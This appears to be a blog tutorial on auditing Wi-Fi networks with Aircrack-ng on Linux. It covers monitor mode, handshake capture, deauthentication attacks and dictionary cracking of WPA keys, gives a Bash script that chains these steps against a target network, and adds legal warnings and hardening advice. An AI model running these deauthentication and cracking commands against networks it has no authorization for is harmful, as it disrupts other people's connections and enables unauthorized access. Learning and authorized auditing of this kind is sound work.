Aircrack-ng: Complete guide for auditing Wi‑Fi networks on Linux

Posted on by BlockmyIP | Category: Programas Linux

Introduction

Today, wireless network security is a critical aspect for both home users and IT professionals. The proliferation of IoT devices, remote work, and growing reliance on connectivity have increased the attack surface of Wi‑Fi networks. In this context, Aircrack-ng has become one of the most powerful and versatile tools for conducting security audits in Linux environments. This article provides a comprehensive guide, from basic concepts to advanced usage techniques, so you can assess and strengthen the protection of your own networks responsibly.

What is Aircrack-ng?

Aircrack-ng is a set of command‑line utilities designed to detect, capture, analyze, and attempt to crack the keys of Wi‑Fi networks protected with WEP, WPA, WPA2, and experimentally WPA3 protocols. The package includes specialized tools such as airmon-ng (to put the interface in monitor mode), airodump-ng (packet capture), aireplay-ng (inject traffic and provoke deauthentications), and aircrack-ng (the cracking engine). Thanks to its modular architecture, each phase of the audit process can be run independently or chained via scripts, making it ideal for both manual testing and automated environments.

Main Features

  • Broad support for various encryption types: WEP, WPA, WPA2, and WPA3 (experimental).
  • Available in the official repositories of most Linux distributions (Ubuntu, Debian, Fedora, Arch, openSUSE, etc.).
  • Lightweight command‑line interface suitable for servers, embedded systems, and headless environments.
  • Large active community, extensive documentation, and numerous tutorials, scripts, and help forums.
  • Compatibility with a wide range of Wi‑Fi adapters that support monitor mode and packet injection (Atheros, Realtek, certain Intel and Ralink chips).
  • Ability to integrate with other tools such as hashcat, crunch, or pyrit for more effective attacks using GPU or rainbow tables.

Installation on Popular Linux Distributions

Before installing, verify that your adapter supports monitor mode and injection. You can consult the compatibility list on the official Aircrack-ng wiki or run airmon-ng to see if the interface appears.

Ubuntu / Debian

  • Update package index: sudo apt update
  • Install the main package: sudo apt install aircrack-ng
  • Optional but recommended for compiling from source or using specific drivers: sudo apt install linux-headers-$(uname -r) build-essential libssl-dev

Fedora

  • Install from the official repository: sudo dnf install aircrack-ng
  • For development and compilation tools: sudo dnf install kernel-devel gcc make

Arch Linux

  • Use the community repository: sudo pacman -S aircrack-ng
  • If you prefer to compile the latest version: git clone https://github.com/aircrack-ng/aircrack-ng.git, then cd aircrack-ng && make && sudo make install.

Preparing the Interface

The first step is to put the Wi‑Fi card into monitor mode. Assuming your interface is called wlan0:

  • Stop any service that could interfere with capture: sudo airmon-ng check kill
  • Enable monitor mode: sudo airmon-ng start wlan0
  • This creates a new interface, usually wlan0mon, ready to capture traffic.
  • Check the status with iwconfig; you should see “Mode:Monitor” on the created interface.

Packet Capture with airodump-ng

To identify nearby networks and obtain the necessary handshakes, run:

  • sudo airodump-ng wlan0mon

This command displays a real‑time table with BSSID, ESSID, channel, signal strength, and associated clients. Note the BSSID and channel of the target network, for example AA:BB:CC:DD:EE:FF on channel 6.

Then focus the capture on that network and save the data to a file:

  • sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon

The -w parameter defines the prefix for output files (captura-01.cap, captura-01.csv, etc.). While the capture is active, you need to provoke a handshake.

Obtaining the Handshake (WPA/WPA2)

To force a client’s reauthentication and capture the four‑way handshake, use aireplay-ng:

  • sudo aireplay-ng -0 2 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon

The argument -0 2 sends two deauthentication packets; -a specifies the AP’s BSSID and -c the target client’s MAC address. When the client reconnects, the handshake will be recorded in the capture file.

If you don’t know a client’s MAC, you can leave the -c field empty; aireplay-ng will send deauthentications to all associated clients, increasing the chance of capturing a handshake.

Cracking the Key with aircrack-ng

With the capture file containing the handshake, you can attempt to crack the key using a dictionary:

  • sudo aircrack-ng -w /ruta/al/diccionario.txt captura-01.cap

Aircrack-ng will test each password in the dictionary against the handshake. If the key is present, it will show something like:

  • KEY FOUND! [ miClaveSecreta ]

For pure brute‑force attacks (not recommended due to time required), you can combine Aircrack-ng with tools like crunch or hashcat. For example, generate an 8‑10 length dictionary with crunch 8 10 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt and then pass it to Aircrack-ng.

You can also explicitly specify the attack type:

  • -a 1 for WEP.
  • -a 2 for WPA/WPA2.
  • -b to filter by BSSID when multiple captures are present.

Automation with Scripts

For repetitive tests or audits of multiple networks, it is useful to create scripts that chain the phases. A basic Bash example:

#!/bin/bash
INTERFAZ=wlan0mon
CANAL=6
BSSID=AA:BB:CC:DD:EE:FF
OUTPUT=ataque

# Put interface in monitor mode
sudo airmon-ng start wlan0
# Capture handshake
sudo airodump-ng -c $CANAL --bssid $BSSID -w $OUTPUT $INTERFAZ &
CAPTURE_PID=$!
# Wait a bit for capture to start
sleep 5
# Deauthenticate clients
sudo aireplay-ng -0 5 -a $BSSID $INTERFAZ
# Wait for handshake capture
sleep 15
kill $CAPTURE_PID
# Attempt cracking
sudo aircrack-ng -w /ruta/al/diccionario.txt ${OUTPUT}-01.cap

This script activates the interface, starts capture, sends deauthentication packets, and after an interval attempts to crack the key. You can expand it with logging, email notifications, or integration with vulnerability management tools.

Troubleshooting Common Issues

  • Interface does not enter monitor mode: Verify that the driver supports this functionality and that there are no conflicts with NetworkManager or wpa_supplicant. Use sudo airmon-ng check kill to stop them.
  • No networks appear in airodump-ng: Ensure the card is actually in monitor mode (iwconfig) and that you are within range; some adapters have limited sensitivity.
  • Handshake not captured: This may be due to lack of active clients or an AP that ignores deauthentications. Try moving closer to the router, using a higher‑gain antenna, or waiting for a device to connect naturally.
  • Aircrack-ng does not find the key despite having the handshake: Verify that the dictionary contains the exact password; try transformation rules (--rules in hashcat) or combine multiple lists.
  • Permission errors: Most operations require root privileges; run commands with sudo or switch to a root session.

Ethical and Legal Considerations

It is essential to remember that using Aircrack-ng on networks without explicit authorization is illegal and violates computer security laws in most countries. This guide is intended exclusively for:

  • Security audits on your own networks or on those where you have written permission from the owner.
  • Controlled lab environments for learning and certification (e.g., OSCP, CEH, GWAPT).
  • Increasing awareness of Wi‑Fi configuration vulnerabilities and applying appropriate countermeasures.

Always work within the legal framework and respect others’ privacy.

Best Practices to Protect Your Wi‑Fi Network

After conducting your tests, apply the following recommendations to strengthen security:

  • Use WPA3 encryption when available; otherwise, use WPA2‑AES with a long, random password (minimum 20 characters).
  • Disable WPS, as it can be exploited to obtain the PIN and derive the key.
  • Regularly update router firmware to patch known vulnerabilities.
  • Segment the guest network and limit access to critical resources via VLAN or separate SSIDs.
  • Monitor traffic with tools such as Wireshark or tcpdump to detect anomalous behavior.
  • Implement MAC address filtering as an additional layer (though not foolproof) and periodically review the list of connected devices.

Conclusion

Aircrack-ng is an essential tool for any security professional working in Linux environments who needs to evaluate the resilience of their wireless networks. Its combination of utilities for monitoring, capture, injection, and cracking provides a complete and flexible workflow. However, its power entails great responsibility: use it only with permission and within legal limits. With the knowledge gained from this post, you will be better prepared to identify weaknesses, apply patches, and keep your Wi‑Fi connections secure against external threats.